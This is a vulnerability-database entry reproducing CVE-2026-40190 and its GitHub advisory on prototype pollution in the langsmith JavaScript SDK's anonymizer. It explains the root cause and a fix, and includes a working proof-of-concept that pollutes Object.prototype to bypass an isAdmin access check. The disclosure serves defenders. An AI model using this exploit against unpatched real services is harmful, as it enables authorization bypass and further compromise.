CVE-2026-40190 (GCVE-0-2026-40190)

Vulnerability from cvelistv5 – Published: 2026-04-10 19:47 – Updated: 2026-04-10 19:47

Title

LangSmith Client SDKs has Prototype Pollution in langsmith-sdk via Incomplete `__proto__` Guard in Internal lodash `set()`

Summary

LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.

Severity ?

5.6 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

URL

Tags

https://github.com/langchain-ai/langsmith-sdk/sec…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	langchain-ai	langsmith-sdk	Affected: < 0.5.18

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "langsmith-sdk",
          "vendor": "langchain-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.5.18"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LangSmith Client SDKs provide SDK\u0027s for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-10T19:47:57.642Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252"
        }
      ],
      "source": {
        "advisory": "GHSA-fw9q-39r9-c252",
        "discovery": "UNKNOWN"
      },
      "title": "LangSmith Client SDKs has Prototype Pollution in langsmith-sdk via Incomplete `__proto__` Guard in Internal lodash `set()`"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40190",
    "datePublished": "2026-04-10T19:47:57.642Z",
    "dateReserved": "2026-04-09T20:59:17.620Z",
    "dateUpdated": "2026-04-10T19:47:57.642Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40190\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-10T20:16:24.043\",\"lastModified\":\"2026-04-10T20:16:24.043\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LangSmith Client SDKs provide SDK\u0027s for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":5.6,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.2,\"impactScore\":3.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-FW9Q-39R9-C252

Vulnerability from github – Published: 2026-04-10 20:18 – Updated: 2026-04-10 21:37

Summary

LangSmith Client SDKs has Prototype Pollution in langsmith-sdk via Incomplete `__proto__` Guard in Internal lodash `set()`

Details

GHSA-fw9q-39r9-c252: Prototype Pollution via Incomplete Lodash `set()` Guard in `langsmith-sdk`

Severity: Medium (CVSS ~5.6) Status: Fixed in 0.5.18

Summary

The LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process.

Affected Products

Product	Affected Versions	Component
`langsmith` (npm)	<= 0.5.17	`js/src/utils/lodash/baseAssignValue.ts`, `js/src/anonymizer/index.ts`
langchain-ai/langsmith-sdk	GitHub main branch (as of 2026-03-24)	JS/TypeScript SDK

Not affected: The Python SDK (langsmith on PyPI) does not use lodash or an equivalent pattern.

Root Cause

The SDK vendors an internal copy of lodash's set() function at js/src/utils/lodash/. The baseAssignValue() function at baseAssignValue.ts:11 implements a guard for prototype pollution:

function baseAssignValue(object: Record<string, any>, key: string, value: any) {
  if (key === "__proto__") {
    Object.defineProperty(object, key, {
      configurable: true, enumerable: true, value: value, writable: true,
    });
  } else {
    object[key] = value;  // ← No guard for "constructor" or "prototype" keys
  }
}

This blocks __proto__ pollution but does not block the constructor.prototype traversal path. When set() is called with a path like "constructor.prototype.polluted":

castPath() splits it into ["constructor", "prototype", "polluted"]
baseSet() iterates: obj.constructor → Object → Object.prototype
assignValue(Object.prototype, "polluted", value) calls baseAssignValue()
Key is "polluted" (not "__proto__"), so the guard is bypassed
Object.prototype.polluted = value — all objects are polluted

Attack Vector via Anonymizer

The createAnonymizer() API (importable as langsmith/anonymizer) processes data by:

Extracting string nodes — extractStringNodes() walks an object recursively and builds dotted paths from keys
Applying regex replacements — If a string value matches a configured pattern, the node is marked for update (anonymizer/index.ts:95)
Writing back with set() — set(mutateValue, node.path, node.value) writes the replaced value back (anonymizer/index.ts:123)

An attacker who controls keys in data being anonymized can construct a nested object where the path resolves to constructor.prototype.X:

{
  wrapper: {
    "constructor.prototype.isAdmin": "contains-secret-pattern"
  }
}

extractStringNodes() produces path "wrapper.constructor.prototype.isAdmin". When the replacement triggers and set() writes back, it traverses up to Object.prototype.

Although createAnonymizer() uses deepClone() at anonymizer/index.ts:62 (JSON.parse(JSON.stringify(data))), the prototype chain traversal escapes the clone boundary because clone.wrapper.constructor resolves to the global Object constructor, not a cloned copy.

Proof of Concept

import { createAnonymizer } from "langsmith/anonymizer";

const anonymizer = createAnonymizer([
  { pattern: "secret", replace: "[REDACTED]" }
]);

console.log("BEFORE:", ({}).isAdmin);  // undefined

const maliciousInput = {
  wrapper: {
    "constructor.prototype.isAdmin": "this-is-secret-data"
  }
};

anonymizer(maliciousInput);

console.log("AFTER:", ({}).isAdmin);   // "this-is-[REDACTED]-data"
console.log("Array:", [].isAdmin);     // "this-is-[REDACTED]-data"

function checkAccess(user) {
  if (user.isAdmin) return "ACCESS GRANTED";
  return "ACCESS DENIED";
}
console.log(checkAccess({ name: "bob" }));  // "ACCESS GRANTED" ← BYPASSED

Impact

Prototype pollution in a Node.js process can enable:

Authentication bypass — if (user.isAdmin) checks succeed on all objects
Remote Code Execution — Exploitable in template engines (Pug, EJS, Handlebars, Nunjucks) via polluted prototype properties that reach eval()/Function() sinks
Denial of Service — Overwriting toString, valueOf, or hasOwnProperty on all objects
Data exfiltration — Polluting serialization methods to inject attacker-controlled values

Remediation

In baseAssignValue.ts, extend the guard to cover constructor and prototype keys:

function baseAssignValue(object, key, value) {
  if (key === "__proto__" || key === "constructor" || key === "prototype") {
    Object.defineProperty(object, key, {
      configurable: true, enumerable: true, value, writable: true,
    });
  } else {
    object[key] = value;
  }
}

As defense in depth, extractStringNodes() in anonymizer/index.ts should also sanitize or reject path segments matching constructor or prototype before passing them to set().

Timeline

Date	Event
2026-03-24	Initial report submitted
2026-04-09	Vendor confirmed; fixed in 0.5.18

Credits

Reported by: OneThing4101

Severity ?

5.6 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.17"
      },
      "package": {
        "ecosystem": "npm",
        "name": "langsmith"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40190"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T20:18:02Z",
    "nvd_published_at": "2026-04-10T20:16:24Z",
    "severity": "MODERATE"
  },
  "details": "# GHSA-fw9q-39r9-c252: Prototype Pollution via Incomplete Lodash `set()` Guard in `langsmith-sdk`\n\n**Severity:** Medium (CVSS ~5.6)\n**Status:** Fixed in 0.5.18\n\n---\n\n## Summary\n\nThe LangSmith JavaScript/TypeScript SDK (`langsmith`) contains an incomplete prototype pollution fix in its internally vendored lodash `set()` utility. The `baseAssignValue()` function only guards against the `__proto__` key, but fails to prevent traversal via `constructor.prototype`. This allows an attacker who controls keys in data processed by the `createAnonymizer()` API to pollute `Object.prototype`, affecting all objects in the Node.js process.\n\n---\n\n## Affected Products\n\n| Product | Affected Versions | Component |\n|---------|-------------------|-----------|\n| `langsmith` (npm) | \u003c= 0.5.17 | `js/src/utils/lodash/baseAssignValue.ts`, `js/src/anonymizer/index.ts` |\n| langchain-ai/langsmith-sdk | GitHub main branch (as of 2026-03-24) | JS/TypeScript SDK |\n\n**Not affected:** The Python SDK (`langsmith` on PyPI) does not use lodash or an equivalent pattern.\n\n---\n\n## Root Cause\n\nThe SDK vendors an internal copy of lodash\u0027s `set()` function at `js/src/utils/lodash/`. The `baseAssignValue()` function at `baseAssignValue.ts:11` implements a guard for prototype pollution:\n\n```typescript\nfunction baseAssignValue(object: Record\u003cstring, any\u003e, key: string, value: any) {\n  if (key === \"__proto__\") {\n    Object.defineProperty(object, key, {\n      configurable: true, enumerable: true, value: value, writable: true,\n    });\n  } else {\n    object[key] = value;  // \u2190 No guard for \"constructor\" or \"prototype\" keys\n  }\n}\n```\n\nThis blocks `__proto__` pollution but does **not** block the `constructor.prototype` traversal path. When `set()` is called with a path like `\"constructor.prototype.polluted\"`:\n\n1. `castPath()` splits it into `[\"constructor\", \"prototype\", \"polluted\"]`\n2. `baseSet()` iterates: `obj.constructor` \u2192 `Object` \u2192 `Object.prototype`\n3. `assignValue(Object.prototype, \"polluted\", value)` calls `baseAssignValue()`\n4. Key is `\"polluted\"` (not `\"__proto__\"`), so the guard is bypassed\n5. `Object.prototype.polluted = value` \u2014 all objects are polluted\n\n---\n\n## Attack Vector via Anonymizer\n\nThe `createAnonymizer()` API (importable as `langsmith/anonymizer`) processes data by:\n\n1. **Extracting string nodes** \u2014 `extractStringNodes()` walks an object recursively and builds dotted paths from keys\n2. **Applying regex replacements** \u2014 If a string value matches a configured pattern, the node is marked for update (`anonymizer/index.ts:95`)\n3. **Writing back with `set()`** \u2014 `set(mutateValue, node.path, node.value)` writes the replaced value back (`anonymizer/index.ts:123`)\n\nAn attacker who controls keys in data being anonymized can construct a nested object where the path resolves to `constructor.prototype.X`:\n\n```javascript\n{\n  wrapper: {\n    \"constructor.prototype.isAdmin\": \"contains-secret-pattern\"\n  }\n}\n```\n\n`extractStringNodes()` produces path `\"wrapper.constructor.prototype.isAdmin\"`. When the replacement triggers and `set()` writes back, it traverses up to `Object.prototype`.\n\nAlthough `createAnonymizer()` uses `deepClone()` at `anonymizer/index.ts:62` (`JSON.parse(JSON.stringify(data))`), the prototype chain traversal escapes the clone boundary because `clone.wrapper.constructor` resolves to the global `Object` constructor, not a cloned copy.\n\n---\n\n## Proof of Concept\n\n```javascript\nimport { createAnonymizer } from \"langsmith/anonymizer\";\n\nconst anonymizer = createAnonymizer([\n  { pattern: \"secret\", replace: \"[REDACTED]\" }\n]);\n\nconsole.log(\"BEFORE:\", ({}).isAdmin);  // undefined\n\nconst maliciousInput = {\n  wrapper: {\n    \"constructor.prototype.isAdmin\": \"this-is-secret-data\"\n  }\n};\n\nanonymizer(maliciousInput);\n\nconsole.log(\"AFTER:\", ({}).isAdmin);   // \"this-is-[REDACTED]-data\"\nconsole.log(\"Array:\", [].isAdmin);     // \"this-is-[REDACTED]-data\"\n\nfunction checkAccess(user) {\n  if (user.isAdmin) return \"ACCESS GRANTED\";\n  return \"ACCESS DENIED\";\n}\nconsole.log(checkAccess({ name: \"bob\" }));  // \"ACCESS GRANTED\" \u2190 BYPASSED\n```\n\n---\n\n## Impact\n\nPrototype pollution in a Node.js process can enable:\n\n1. **Authentication bypass** \u2014 `if (user.isAdmin)` checks succeed on all objects\n2. **Remote Code Execution** \u2014 Exploitable in template engines (Pug, EJS, Handlebars, Nunjucks) via polluted prototype properties that reach `eval()`/`Function()` sinks\n3. **Denial of Service** \u2014 Overwriting `toString`, `valueOf`, or `hasOwnProperty` on all objects\n4. **Data exfiltration** \u2014 Polluting serialization methods to inject attacker-controlled values\n\n---\n\n## Remediation\n\nIn `baseAssignValue.ts`, extend the guard to cover `constructor` and `prototype` keys:\n\n```typescript\nfunction baseAssignValue(object, key, value) {\n  if (key === \"__proto__\" || key === \"constructor\" || key === \"prototype\") {\n    Object.defineProperty(object, key, {\n      configurable: true, enumerable: true, value, writable: true,\n    });\n  } else {\n    object[key] = value;\n  }\n}\n```\n\nAs defense in depth, `extractStringNodes()` in `anonymizer/index.ts` should also sanitize or reject path segments matching `constructor` or `prototype` before passing them to `set()`.\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-03-24 | Initial report submitted |\n| 2026-04-09 | Vendor confirmed; fixed in 0.5.18 |\n\n---\n\n## Credits\n\nReported by: OneThing4101",
  "id": "GHSA-fw9q-39r9-c252",
  "modified": "2026-04-10T21:37:36Z",
  "published": "2026-04-10T20:18:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40190"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langsmith-sdk/pull/2690"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langsmith-sdk/commit/31d3c3aec02892f4312baae112f817d6b2f0ebe3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langchain-ai/langsmith-sdk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LangSmith Client SDKs has Prototype Pollution in langsmith-sdk via Incomplete `__proto__` Guard in Internal lodash `set()`"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40190 (GCVE-0-2026-40190)

GHSA-FW9Q-39R9-C252

GHSA-fw9q-39r9-c252: Prototype Pollution via Incomplete Lodash set() Guard in langsmith-sdk

Summary

Affected Products

Root Cause

Attack Vector via Anonymizer

Proof of Concept

Impact

Remediation

Timeline

Credits

Tags

Sightings

Nomenclature

GHSA-fw9q-39r9-c252: Prototype Pollution via Incomplete Lodash `set()` Guard in `langsmith-sdk`